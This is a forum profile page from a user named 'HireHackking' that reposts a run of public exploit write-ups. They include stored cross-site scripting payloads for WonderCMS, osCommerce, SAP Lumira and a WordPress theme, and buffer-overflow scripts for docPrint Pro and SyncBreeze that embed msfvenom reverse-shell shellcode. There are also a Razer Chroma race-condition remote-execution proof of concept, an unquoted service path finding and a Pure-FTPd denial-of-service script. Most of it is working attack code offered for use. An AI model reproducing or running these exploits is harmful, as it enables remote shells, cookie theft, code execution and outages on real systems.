Jump to content

HireHackking

Members

  • Joined

  • Last visited

View Profile Find content

Everything posted by HireHackking

  1. HireHackking

    WonderCMS 3.1.3 - 'page' Persistent Cross-Site Scripting

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: WonderCMS 3.1.3 - 'page' Persistent Cross-Site Scripting # Date: 20-11-2020 # Exploit Author: Mayur Parmar # Vendor Homepage: https://www.wondercms.com/ # Version: 3.1.3 # Tested on: PopOS Stored Cross-site scripting(XSS): Stored attacks are those where the injected script is permanently stored on the target servers, such as in a database, in a message forum, visitor log, comment field, etc. The victim then retrieves the malicious script from the server when it requests the stored information. Stored XSS is also sometimes referred to as Persistent XSS. Attack vector: This vulnerability can results attacker to inject the XSS payload in Page keywords and each time any user will visits the website, the XSS triggers and attacker can able to steal the cookie according to the crafted payload. Vulnerable Parameters: Page Title. Steps-To-Reproduce: 1. Go to the Simple website builder. 2. Put this payload in Page keywords: Mayur"><img src=x onerror=confirm("XSS")> 3. Now go to the website and the XSS will be triggered.
  2. HireHackking

    docPrint Pro 8.0 - 'Add URL' Buffer Overflow (SEH Egghunter)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: docPrint Pro 8.0 - 'Add URL' Buffer Overflow (SEH Egghunter) # Date: 2020-07-26 # Exploit Author: MasterVlad # Vendor Homepage: http://www.verypdf.com # Software Link: http://dl.verypdf.net/docprint_pro_setup.exe # Version: 8.0 # Vulnerability Type: Local Buffer Overflow # Tested on: Windows 7 32-bit # Proof of Concept: # 1. Run the python script # 2. Open exploit.txt and copy the content to clipboard # 3. Open doc2pdf_win.exe and go to File -> Add URL # 4. Paste the clipboard into the field and click on Ok #!/usr/bin/python # encoded egghunter egg = "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x54\x58\x66\x05\x44\x17\x50\x5c\x25\x4A" egg += "\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x7F\x01\x7F\x01\x2D\x0B\x01\x7F\x01\x2D\x01\x16\x02\x15\x50" egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x01\x7F\x01\x01\x2D\x50\x0B\x14\x4F\x50" egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x7F\x7F\x01\x01\x2D\x51\x29\x73\x04\x50" egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x01\x01\x2C\x50\x2D\x10\x46\x7F\x7F\x50" egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x45\x7B\x26\x0C\x2D\x7F\x7F\x7F\x7F\x50" egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x7F\x28\x01\x52\x2D\x7F\x7F\x31\x7F\x50" egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x72\x4D\x3D\x16\x2D\x7F\x70\x70\x7F\x50" egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x1A\x7B\x01\x7F\x2D\x7F\x01\x33\x7F\x2D\x01\x02\x01\x02\x50" # msfvenom -p windows/shell_reverse_tcp LHOST=192.168.164.129 LPORT=443 -b "\x00\x0a\x0d\x13\x14\x15\x16" -f py -e x86/alpha_mixed BufferRegister=EDI buf = "" buf += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" buf += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30" buf += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42" buf += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49" buf += "\x69\x6c\x68\x68\x6e\x62\x55\x50\x45\x50\x43\x30\x63" buf += "\x50\x6e\x69\x6a\x45\x45\x61\x59\x50\x55\x34\x4e\x6b" buf += "\x52\x70\x76\x50\x6c\x4b\x73\x62\x76\x6c\x6c\x4b\x70" buf += "\x52\x42\x34\x6e\x6b\x43\x42\x75\x78\x64\x4f\x48\x37" buf += "\x42\x6a\x71\x36\x65\x61\x39\x6f\x6e\x4c\x67\x4c\x53" buf += "\x51\x71\x6c\x76\x62\x56\x4c\x67\x50\x79\x51\x78\x4f" buf += "\x36\x6d\x43\x31\x79\x57\x6d\x32\x4c\x32\x72\x72\x66" buf += "\x37\x6e\x6b\x72\x72\x56\x70\x6e\x6b\x32\x6a\x75\x6c" buf += "\x4e\x6b\x62\x6c\x37\x61\x33\x48\x69\x73\x43\x78\x56" buf += "\x61\x38\x51\x50\x51\x4e\x6b\x71\x49\x31\x30\x57\x71" buf += "\x4b\x63\x6e\x6b\x71\x59\x37\x68\x68\x63\x57\x4a\x50" buf += "\x49\x6e\x6b\x75\x64\x4e\x6b\x43\x31\x68\x56\x35\x61" buf += "\x59\x6f\x6e\x4c\x69\x51\x48\x4f\x36\x6d\x55\x51\x6f" buf += "\x37\x65\x68\x4b\x50\x70\x75\x69\x66\x73\x33\x51\x6d" buf += "\x6a\x58\x35\x6b\x63\x4d\x76\x44\x54\x35\x4d\x34\x43" buf += "\x68\x4e\x6b\x70\x58\x37\x54\x76\x61\x59\x43\x62\x46" buf += "\x6c\x4b\x54\x4c\x72\x6b\x6e\x6b\x51\x48\x35\x4c\x35" buf += "\x51\x79\x43\x6c\x4b\x43\x34\x6c\x4b\x63\x31\x68\x50" buf += "\x6d\x59\x57\x34\x76\x44\x67\x54\x31\x4b\x51\x4b\x33" buf += "\x51\x71\x49\x72\x7a\x50\x51\x79\x6f\x69\x70\x43\x6f" buf += "\x63\x6f\x33\x6a\x6e\x6b\x65\x42\x48\x6b\x6c\x4d\x31" buf += "\x4d\x50\x68\x45\x63\x55\x62\x73\x30\x75\x50\x30\x68" buf += "\x44\x37\x73\x43\x45\x62\x43\x6f\x43\x64\x45\x38\x42" buf += "\x6c\x53\x47\x46\x46\x63\x37\x69\x6f\x69\x45\x48\x38" buf += "\x4a\x30\x45\x51\x57\x70\x55\x50\x67\x59\x49\x54\x70" buf += "\x54\x32\x70\x42\x48\x44\x69\x6d\x50\x70\x6b\x67\x70" buf += "\x79\x6f\x6b\x65\x66\x30\x30\x50\x70\x50\x32\x70\x43" buf += "\x70\x72\x70\x67\x30\x62\x70\x75\x38\x58\x6a\x36\x6f" buf += "\x49\x4f\x79\x70\x69\x6f\x48\x55\x4c\x57\x53\x5a\x56" buf += "\x65\x52\x48\x79\x50\x79\x38\x4f\x54\x6d\x51\x52\x48" buf += "\x43\x32\x53\x30\x63\x31\x4d\x6b\x6d\x59\x38\x66\x30" buf += "\x6a\x66\x70\x43\x66\x53\x67\x61\x78\x5a\x39\x6e\x45" buf += "\x72\x54\x33\x51\x59\x6f\x58\x55\x4b\x35\x59\x50\x44" buf += "\x34\x66\x6c\x69\x6f\x32\x6e\x65\x58\x31\x65\x4a\x4c" buf += "\x50\x68\x6a\x50\x68\x35\x39\x32\x73\x66\x49\x6f\x58" buf += "\x55\x62\x48\x42\x43\x32\x4d\x73\x54\x57\x70\x6b\x39" buf += "\x39\x73\x66\x37\x76\x37\x42\x77\x55\x61\x49\x66\x50" buf += "\x6a\x54\x52\x73\x69\x70\x56\x78\x62\x49\x6d\x32\x46" buf += "\x49\x57\x57\x34\x51\x34\x65\x6c\x53\x31\x65\x51\x4c" buf += "\x4d\x52\x64\x61\x34\x32\x30\x6b\x76\x47\x70\x72\x64" buf += "\x51\x44\x42\x70\x42\x76\x46\x36\x43\x66\x77\x36\x42" buf += "\x76\x62\x6e\x32\x76\x71\x46\x70\x53\x46\x36\x33\x58" buf += "\x61\x69\x58\x4c\x35\x6f\x6b\x36\x6b\x4f\x4b\x65\x4d" buf += "\x59\x49\x70\x30\x4e\x31\x46\x33\x76\x6b\x4f\x66\x50" buf += "\x71\x78\x43\x38\x4b\x37\x37\x6d\x73\x50\x6b\x4f\x4b" buf += "\x65\x6f\x4b\x48\x70\x6c\x75\x4f\x52\x72\x76\x73\x58" buf += "\x49\x36\x6e\x75\x4d\x6d\x4d\x4d\x59\x6f\x39\x45\x55" buf += "\x6c\x63\x36\x53\x4c\x66\x6a\x4d\x50\x79\x6b\x6b\x50" buf += "\x64\x35\x46\x65\x6f\x4b\x72\x67\x45\x43\x50\x72\x70" buf += "\x6f\x32\x4a\x65\x50\x51\x43\x49\x6f\x59\x45\x41\x41" exploit = "A"*3876 exploit += "\x74\x06\x75\x04" # 0x1001062d - pop pop ret - reg.dll exploit += "\x2d\x06\x01\x10" exploit += egg exploit += "D"*(10000-3884-len(egg)-len(buf)-8) exploit += "T00WT00W" exploit += buf f = open("exploit.txt", "w") f.write(exploit) f.close()
  3. HireHackking

    Wondershare Driver Install Service help 10.7.1.321 - 'ElevationService' Unquote Service Path

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Wondershare Driver Install Service help 10.7.1.321 - 'ElevationService' Unquote Service Path # Date: 2020-11-24 # Exploit Author: Luis Sandoval # Vendor Homepage: https://www.wondershare.com/ # Software Link: https://www.wondershare.com/drfone/ # Version: 10.7.1.321 # Tested on: Windows 10 Home Single Language x64 Esp # Service info: C:\Users\user>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """ Wondershare Driver Install Service help ElevationService C:\Program Files (x86)\Wondershare\Dr.Fone\Addins\Recovery\ElevationService.exe Auto C:\Users\user>sc qc ElevationService [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: ElevationService TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Wondershare\Dr.Fone\Addins\Recovery\ElevationService.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : Wondershare Driver Install Service help DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem
  4. HireHackking

    SyncBreeze 10.0.28 - 'password' Remote Buffer Overflow

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: SyncBreeze 10.0.28 - 'password' Remote Buffer Overflow # Date: 18-Sep-2020 # Exploit Author: Abdessalam king(A.salam) # Vendor Homepage: http://www.syncbreeze.com # Software Link: http://www.syncbreeze.com/setups/syncbreezeent_setup_v10.0.28.exe # Version: 10.0.28 # Tested on: Windows 7,windows xp,windows 10 #72413372 [*] Exact match at offset 520 #jmp esp FFE4 \xff\xe4 #!mona modules #!mona find -s "\xff\xe4" -m libspp.dll #address esp => 10090C83 #badchars ==> "\x00\x0a\x0d\x25\x26\x2b\x3d" #msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.199 LPORT=1337 -f c -b "\x00\x0a\x0d\x25\x26\x2b\x3d" EXITFUNC=thread #!/usr/bin/python import socket shell ="" shell +="\xba\x4b\x38\x98\x39\xdd\xc7\xd9\x74\x24\xf4\x5f\x33\xc9\xb1" shell +="\x53\x83\xef\xfc\x31\x57\x10\x03\x57\x10\xa9\xcd\x64\xd1\xaf" shell +="\x2e\x95\x22\xcf\xa7\x70\x13\xcf\xdc\xf1\x04\xff\x97\x54\xa9" shell +="\x74\xf5\x4c\x3a\xf8\xd2\x63\x8b\xb6\x04\x4d\x0c\xea\x75\xcc" shell +="\x8e\xf0\xa9\x2e\xae\x3b\xbc\x2f\xf7\x21\x4d\x7d\xa0\x2e\xe0" shell +="\x92\xc5\x7a\x39\x18\x95\x6b\x39\xfd\x6e\x8a\x68\x50\xe4\xd5" shell +="\xaa\x52\x29\x6e\xe3\x4c\x2e\x4a\xbd\xe7\x84\x21\x3c\x2e\xd5" shell +="\xca\x93\x0f\xd9\x39\xed\x48\xde\xa1\x98\xa0\x1c\x5c\x9b\x76" shell +="\x5e\xba\x2e\x6d\xf8\x49\x88\x49\xf8\x9e\x4f\x19\xf6\x6b\x1b" shell +="\x45\x1b\x6a\xc8\xfd\x27\xe7\xef\xd1\xa1\xb3\xcb\xf5\xea\x60" shell +="\x75\xaf\x56\xc7\x8a\xaf\x38\xb8\x2e\xbb\xd5\xad\x42\xe6\xb1" shell +="\x02\x6f\x19\x42\x0c\xf8\x6a\x70\x93\x52\xe5\x38\x5c\x7d\xf2" shell +="\x3f\x77\x39\x6c\xbe\x77\x3a\xa4\x05\x23\x6a\xde\xac\x4b\xe1" shell +="\x1e\x50\x9e\x9c\x15\xf7\x70\x83\xd7\x6d\x71\x29\x2a\x1a\x9b" shell +="\xa2\xf5\x3a\xa4\x68\x9e\xd3\x58\x93\xbe\xb3\xd5\x75\xaa\xa3" shell +="\xb3\x2e\x43\x06\xe0\xe6\xf4\x79\xc3\x8c\x3b\xf0\xb3\xd9\xd3" shell +="\x4c\xaa\xde\xdc\x4c\xf9\x48\x4b\xc7\xed\x4c\x6a\xd8\x38\xe5" shell +="\xfb\x4f\xb7\x64\x49\xf1\xc8\xac\x3b\xf1\x5c\x4b\xea\xa6\xc8" shell +="\x51\xcb\x81\x57\xa9\x3e\x92\x9f\x55\xbf\xb8\xd4\x60\x55\x83" shell +="\x82\x8c\xb9\x03\x52\xdb\xd3\x03\x3a\xbb\x87\x57\x5f\xc4\x1d" shell +="\xc4\xcc\x51\x9e\xbd\xa1\xf2\xf6\x43\x9c\x35\x59\xbb\xcb\x45" shell +="\x9e\x43\x8d\x4e\x5e\x87\x58\x97\x15\xee\x59\xac\x36\xed\x77" shell +="\xd9\xde\xa8\x12\x60\x83\x4a\xc9\xa7\xba\xc8\xfb\x57\x39\xd0" shell +="\x8e\x52\x05\x56\x63\x2f\x16\x33\x83\x9c\x17\x16"; payload = "username=AAAAA&password="+"A"*520+"\x83\x0c\x09\x10"+ "\x90" * 20 + shell +"\x90"*(1400-520-4-20-len(shell)) req ="" req += "POST /login HTTP/1.1\r\n" req += "Host: 192.168.1.20\r\n" req += "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0\r\n" req += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n" req += "Accept-Language: en-US,en;q=0.5\r\n" req += "Accept-Encoding: gzip, deflate\r\n" req += "Referer: http://192.168.1.20/login\r\n" req += "Content-Type: application/x-www-form-urlencoded\r\n" req += "Content-Length: "+str(len(payload))+"\r\n" req += "Connection: keep-alive\r\n" req += "Upgrade-Insecure-Requests: 1\r\n" req += "\r\n" req += payload # print req s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(("192.168.1.20",80)) s.send(req) print s.recv(1024) s.close()
  5. HireHackking

    osCommerce 2.3.4.1 - 'title' Persistent Cross-Site Scripting

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: osCommerce 2.3.4.1 - 'title' Persistent Cross-Site Scripting # Date: 2020-11-19 # Exploit Author: Emre Aslan # Vendor Homepage: https://www.oscommerce.com/ # Version: 2.3.4.1 # Tested on: Windows & XAMPP ==> Tutorial <== 1- Login to admin panel. 2- Go to the following url. ==> http(s)://(HOST)/catalog/admin/newsletters.php?action=new 3- Enter the XSS payload into the title section and save it. ==> Vulnerable Parameter <== title= (post parameter) ==> HTTP Request <== POST /catalog/admin/newsletters.php?action=insert HTTP/1.1 Host: (HOST) Connection: keep-alive Content-Length: 123 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://(HOST)/ Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://(HOST)/catalog/admin/newsletters.php?action=new Accept-Encoding: gzip, deflate, br Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 Cookie: osCAdminID=s11ou44m0vrasducn78c6sg module=newsletter&title="><img src=1 href=1 onerror="javascript:alert(document.cookie)"></img>&content=xss ==> Vulnerable Source Code <== <div id="contentText"> <table border="0" width="100%" cellspacing="0" cellpadding="2"> <tr> <td><table border="0" width="100%" cellspacing="0" cellpadding="0"> <tr> <td class="pageHeading">Newsletter Manager</td> <td class="pageHeading" align="right"><img src="images/pixel_trans.gif" border="0" alt="" width="57" height="40" /></td> </tr> </table></td> </tr> <tr> <td><table border="0" width="100%" cellspacing="0" cellpadding="0"> <tr> <td valign="top"><table border="0" width="100%" cellspacing="0" cellpadding="2"> <tr class="dataTableHeadingRow"> <td class="dataTableHeadingContent">Newsletters</td> <td class="dataTableHeadingContent" align="right">Size</td> <td class="dataTableHeadingContent" align="right">Module</td> <td class="dataTableHeadingContent" align="center">Sent</td> <td class="dataTableHeadingContent" align="center">Status</td> <td class="dataTableHeadingContent" align="right">Action&nbsp;</td> </tr> <tr id="defaultSelected" class="dataTableRowSelected" onmouseover="rowOverEffect(this)" onmouseout="rowOutEffect(this)" onclick="document.location.href='http://127.0.0.1:8080/oscommerce-2.3.4.1/catalog/admin/newsletters.php?page=1&nID=2&action=preview'"> <td class="dataTableContent"><a href="http://127.0.0.1:8080/oscommerce-2.3.4.1/catalog/admin/newsletters.php?page=1&nID=2&action=preview"><img src="images/icons/preview.gif" border="0" alt="Preview" title="Preview" /></a>&nbsp;"><img src=1 href=1 onerror="javascript:alert(document.cookie)"></img></td> <td class="dataTableContent" align="right">3 bytes</td> <td class="dataTableContent" align="right">newsletter</td> <td class="dataTableContent" align="center"><img src="images/icons/cross.gif" border="0" alt="False" title="False" /></td> <td class="dataTableContent" align="center"><img src="images/icons/unlocked.gif" border="0" alt="Unlocked" title="Unlocked" /></td> <td class="dataTableContent" align="right"><img src="images/icon_arrow_right.gif" border="0" alt="" />&nbsp;</td> </tr> <tr class="dataTableRow" onmouseover="rowOverEffect(this)" onmouseout="rowOutEffect(this)" onclick="document.location.href='http://127.0.0.1:8080/oscommerce-2.3.4.1/catalog/admin/newsletters.php?page=1&nID=1'"> <td class="dataTableContent"><a href="http://127.0.0.1:8080/oscommerce-2.3.4.1/catalog/admin/newsletters.php?page=1&nID=1&action=preview"><img src="images/icons/preview.gif" border="0" alt="Preview" title="Preview" /></a>&nbsp;"><img src=1 href=1 onerror="javascript:alert(1)"></img></td> <td class="dataTableContent" align="right">7 bytes</td> <td class="dataTableContent" align="right">newsletter</td> <td class="dataTableContent" align="center"><img src="images/icons/cross.gif" border="0" alt="False" title="False" /></td> <td class="dataTableContent" align="center"><img src="images/icons/unlocked.gif" border="0" alt="Unlocked" title="Unlocked" /></td> <td class="dataTableContent" align="right"><a href="http://127.0.0.1:8080/oscommerce-2.3.4.1/catalog/admin/newsletters.php?page=1&nID=1"><img src="images/icon_info.gif" border="0" alt="Info" title="Info" /></a>&nbsp;</td> </tr> <tr> <td colspan="6"><table border="0" width="100%" cellspacing="0" cellpadding="2"> <tr> <td class="smallText" valign="top">Displaying <strong>1</strong> to <strong>2</strong> (of <strong>2</strong> newsletters)</td> <td class="smallText" align="right">Page 1 of 1</td> </tr> <tr> <td class="smallText" align="right" colspan="2"><span class="tdbLink"><a id="tdb1" href="http://127.0.0.1:8080/oscommerce-2.3.4.1/catalog/admin/newsletters.php?action=new">New Newsletter</a></span><script type="text/javascript">$("#tdb1").button({icons:{primary:"ui-icon-plus"}}).addClass("ui-priority-secondary").parent().removeClass("tdbLink");</script></td> </tr> </table></td> </tr> </table></td> <td width="25%" valign="top"> <table border="0" width="100%" cellspacing="0" cellpadding="2"> <tr class="infoBoxHeading"> <td class="infoBoxHeading"><strong>"><img src=1 href=1 onerror="javascript:alert(document.cookie)"></img></strong></td> </tr> </table> <table border="0" width="100%" cellspacing="0" cellpadding="2"> <tr> <td align="center" class="infoBoxContent"><span class="tdbLink"><a id="tdb2" href="http://127.0.0.1:8080/oscommerce-2.3.4.1/catalog/admin/newsletters.php?page=1&nID=2&action=preview">Preview</a></span><script type="text/javascript">$("#tdb2").button({icons:{primary:"ui-icon-document"}}).addClass("ui-priority-secondary").parent().removeClass("tdbLink");</script><span class="tdbLink"><a id="tdb3" href="http://127.0.0.1:8080/oscommerce-2.3.4.1/catalog/admin/newsletters.php?page=1&nID=2&action=lock">Lock</a></span><script type="text/javascript">$("#tdb3").button({icons:{primary:"ui-icon-locked"}}).addClass("ui-priority-secondary").parent().removeClass("tdbLink");</script></td> </tr> <tr> <td class="infoBoxContent"><br />Date Added: 11/19/2020</td> </tr> </table> </td> </tr> </table></td> </tr> </table> </div>
  6. HireHackking

    Razer Chroma SDK Server 3.16.02 - Race Condition Remote File Execution

    HireHackking posted a blog entry in Hacker Technology
    Exploit Title: Razer Chroma SDK Server 3.16.02 - Race Condition Remote File Execution Date: 2020-08-13 Exploit Author: Loke Hui Yi Vendor Homepage: https://razerid.razer.com Software Link: http://rzr.to/synapse-3-pc-download Version: <= v3.12.17 Tested on: Windows 10 CVE: CVE-2020-16602 # More info can be found here: # https://www.angelystor.com/2020/09/cve-2020-16602-remote-file-execution-on.html # https://www.youtube.com/watch?v=fkESBVhIdIA # Remote attackers can register applications to the Chroma Server. If the attacker has write access to the ProgramData folder where the Chroma Server stores its data, he can exploit a race condition and get the server to execute a binary of his choosing. # The code below registers an application to the Chroma Server using a name of the attacker's choosing. # The attacker will need to pre-create a folder with the same name as the application to be registered in Razer Chroma SDK\Apps\<appname>, and create an exe file with the same application's name in that folder. The Apps folder is user writable and does not require admin privileges. # The attacker can keep running the code below to get the Server to execute the file while writing the payload to the target directory with another process (eg samba or ftp) in order to exploit the race condition. import requests import json def heartbeat(uri): print(uri + '/heartbeat') r = requests.put(uri + '/heartbeat', verify=False) print(r.text) def keyboard(uri): data = { "effect":"CHROMA_CUSTOM_KEY", "param":{ "color":[ [255, 255, 255, 255, 255, 65280, 65280, 65280, 65280, 65280, 16711680, 16711680, 16711680, 16711680, 16711680, 16776960, 16776960, 16776960, 65535, 65535, 65535, 65535], [255, 255, 255, 255, 255, 65280, 65280, 65280, 65280, 65280, 16711680, 16711680, 16711680, 16711680, 16711680, 16776960, 16776960, 16776960, 65535, 65535, 65535, 65535], [255, 255, 255, 255, 255, 65280, 65280, 65280, 65280, 65280, 16711680, 16711680, 16711680, 16711680, 16711680, 16776960, 16776960, 16776960, 65535, 65535, 65535, 65535], [255, 255, 255, 255, 255, 65280, 65280, 65280, 65280, 65280, 16711680, 16711680, 16711680, 16711680, 16711680, 16776960, 16776960, 16776960, 65535, 65535, 65535, 65535], [255, 255, 255, 255, 255, 65280, 65280, 65280, 65280, 65280, 16711680, 16711680, 16711680, 16711680, 16711680, 16776960, 16776960, 16776960, 65535, 65535, 65535, 65535], [255, 255, 255, 255, 255, 65280, 65280, 65280, 65280, 65280, 16711680, 16711680, 16711680, 16711680, 16711680, 16776960, 16776960, 16776960, 65535, 65535, 65535, 65535] ], "key":[ [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, (16777216 | ~255), 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, (16777216 | ~255), (16777216 | ~255), (16777216 | ~255), 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, (16777216 | ~16776960), 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, (16777216 | ~16776960), (16777216 | ~16776960), (16777216 | ~16776960), 0, 0, 0, 0] ] } } print(uri + '/keyboard') r = requests.put(uri + '/keyboard', json=data, verify=False) print(r.text) text="a" for x in range(20000): text += "a" pload = { "title": "APPNAME", "description": "description", "author": { "name": "name", "contact": "contact" }, "device_supported": [ "keyboard", "mouse", "headset", "mousepad", "keypad", "chromalink"], "category": "application" } server = 'https://chromasdk.io:54236/razer/chromasdk' r = requests.post(server, json=pload, verify=False) json_data = json.loads(r.text) print(json_data) uri = json_data['uri'] heartbeat(uri) #uri = 'https://chromasdk.io:54236/sid=58487' heartbeat(uri) keyboard(uri) print (json_data['sessionid']) do_heartbeat = False if do_heartbeat: sid = 1 uri = 'https://chromasdk.io:54236/sid=' + sid heartbeat(uri) # PoC loop.py for race test ''' import requests def copyfile(src, dst): with open(src, 'rb') as fsrc: with open(dst, 'wb') as fdst: content = fsrc.read() fdst.write(content) while True: try: print("copying") copyfile('pwn.exe', 'C:\\ProgramData\\Razer Chroma SDK\\Apps\\pwn\\pwn.exe') except Exception as e: print(str(e)) '''
  7. HireHackking

    Pure-FTPd 1.0.48 - Remote Denial of Service

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Pure-FTPd 1.0.48 - Remote Denial of Service # Date: 2020. nov. 26., 09:32:17 CET # Exploit Author: xynmaps # Vendor Homepage: https://www.pureftpd.org/project/pure-ftpd/ # Software Link: https://github.com/jedisct1/pure-ftpd/ # Version: 1.0.48 # Tested on: Parrot Security OS 5.9.0 #encoding=utf8 #__author__ = XYN/Dump/NSKB3 #Pure-FTPd Denial of Service exploit by XYN/Dump/NSKB3. """ Pure-FTPd only lets a certain amount of connections to be made to the server, so, by repeatedly making new connections to the server, you can block other legitimite users from making a connection to the server, if the the connections/ip isn't limited. (if it's limited, just run this script from different proxies using proxychains, and it will work) """ import socket import sys import threading import subprocess import time banner = """ ._________________. | Pure-FTPd | | D o S | |_________________| |By XYN/DUMP/NSKB3| |_|_____________|_| |_|_|_|_____|_|_|_| |_|_|_|_|_|_|_|_|_| """ usage = "{} <TARGET> <PORT(DEFAULT:21> <MAX_CONNS(DEFAULT:50)>".format(sys.argv[0]) def test(t,p): s = socket.socket() s.settimeout(10) try: s.connect((t, p)) response = s.recv(65535) s.close() return 0 except socket.error: print("Port {} is not open, please specify a port that is open.".format(p)) sys.exit() def attack(targ, po, id): try: subprocess.Popen("ftp {0} {1}".format(targ, po), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) #print("Worker {} running".format(id)) except OSError: pass def main(): global target, port, start print banner try: target = sys.argv[1] except: print usage sys.exit() try: port = int(sys.argv[2]) except: port = 21 try: conns = int(sys.argv[3]) except: conns = 50 print("[!] Testing if {0}:{1} is open".format(target, port)) test(target, port) print("[+] Port {} open, starting attack...".format(port)) time.sleep(2) print("[+] Attack started on {0}:{1}!".format(target, port)) def loop(target, port, conns): global start threading.Thread(target=timer).start() while 1: for i in range(1, conns + 3): t = threading.Thread(target=attack, args=(target,port,i,)) t.start() if i > conns + 2: t.join() break loop() t = threading.Thread(target=loop, args=(target, port, conns,)) t.start() def timer(): start = time.time() while 1: if start < time.time() + float(900): pass else: subprocess.Popen("pkill ftp", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) t = threading.Thread(target=loop, args=(target, port,)) t.start() break main()
  8. HireHackking

    SAP Lumira 1.31 - Stored Cross-Site Scripting

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: SAP Lumira 1.31 - Stored Cross-Site Scripting # Date: 13.08.2020 # Exploit Author: Ilca Lucian Florin # Vendor Homepage: https://www.sap.com # Software Link: SAP Lumira # Version: <= 1.31 # Tested on: Windows 7 / Windows 10 / Internet Explorer 11 / Google Chrome 84.0.4147.105 # Vulnerable System: https://system/BOE/BI # Reproduce Cross Site Scripting (XSS): 1. Select Web Intelligence Button 2. Wait for SAP Business Objects to load complete 3. CTRL +N or click on New Document 4. Create an empty document 5. Select new variable 6. Select random name for the variable 7. Add the XSS vectors from evidence 8. Open variable tab and click on new created variable name # Cross Site Scripting (XSS) Vectors Used: • "><h1><IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>123</h1> • <IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))">
  9. HireHackking

    Wordpress Theme Wibar 1.1.8 - 'Brand Component' Stored Cross Site Scripting

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Wordpress Theme Wibar 1.1.8 - 'Brand Component' Stored Cross Site Scripting # Date: 11/27/2020 # Exploit Author: Ilca Lucian Florin # Vendor Homepage: http://demo.themeftc.com/wibar # Software Link: https://themeforest.net/item/wibar-responsive-woocommerce-wordpress-theme/20994798 # Version: 1.1.8 # Tested on: Latest Version of Desktop Web Browsers: Chrome, Firefox, Microsoft Edge The WordPress theme contains Brands feature which is vulnerable to stored cross site scripting. The logo URL parameter is vulnerable to cross site scripting. The following vector was used for testing XSS: "><script src="data:;base64,YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=="></script>. In order to reproduce the vulnerability, please follow the next steps: 1. Log in as editor/administrator/contributor/author: https://website.com/wp-admin 2. Go to Brands section 3. Click add new brand and add a custom brand title 4. The vulnerable parameter is: Logo URL / <input type="text" name="ftc_brand_url" id="ftc_brand_url" value=""> 5. Add the following payload: "><script src="data:;base64,YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=="></script> , where base64 == alert(document.domain) 6. Publish 7. The alert will pop up when a user will visit the website on https://website.com/brand/vulnerablebrand. Evidence: 1. https://ibb.co/1fpYJWN 2. https://ibb.co/S7j5Sgd C.V.S.S Score: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:L / 7.5 High
  10. HireHackking

    WonderCMS 3.1.3 - 'uploadFile' Stored Cross-Site Scripting

    HireHackking posted a blog entry in Hacker Technology
